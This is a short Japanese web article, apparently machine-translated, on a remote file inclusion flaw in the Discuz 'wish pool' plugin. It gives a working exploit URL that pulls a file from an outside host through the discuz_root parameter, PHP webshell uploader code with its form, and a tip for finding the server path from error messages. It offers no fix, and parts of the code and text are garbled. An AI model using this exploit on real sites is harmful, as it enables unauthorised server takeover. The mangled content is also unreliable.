1. ホーム
  2. Web プログラミング
  3. セキュリティ関連

Wish poolプラグインリモートコンテナの脆弱性

2022-01-02 21:21:21
wish pool プラグインの wish.php ファイルに問題があります。
require $discuz_root.'. /include/discuzcode.func.php' とします。
手動による活用方法。
リモートインクルードの脆弱性、変数 discuz_root が厳密にフィルタリングされていない、エクスプロイトの方法。
http://url/wish.php?discuz_root=http://www.neeao.com/xxxx.txt?
txtのサフィックスである必要はなく、任意のサフィックスに変更することができます。常にその後にクエスチョンマークを追加することを忘れないでください。
ここでxxxx.txtは、CNからそのポニーでシェルを書き込んでください。
<?copy($_FILES[MyFile][tmp_name],"C:\Inetpub_vhosts﹑bbsguizai.php");? >
ENCTYPE="multipart/form-data" ACTION="" METHOD="POST" >.Form。
<INPUT NAME="MyFile" TYPE="ファイル">
<input VALUE=" submit " TYPE="submit">
</form>
サイトへの物理的なパスは、http://url/wish.php?discuz_root=http://www.huaidan.org/xxxx.txt を送信し、エラーメッセージを見てから xxxx.txt のパスを修正することで確認できます。guizai.php はアップロードしたシェルの名前です。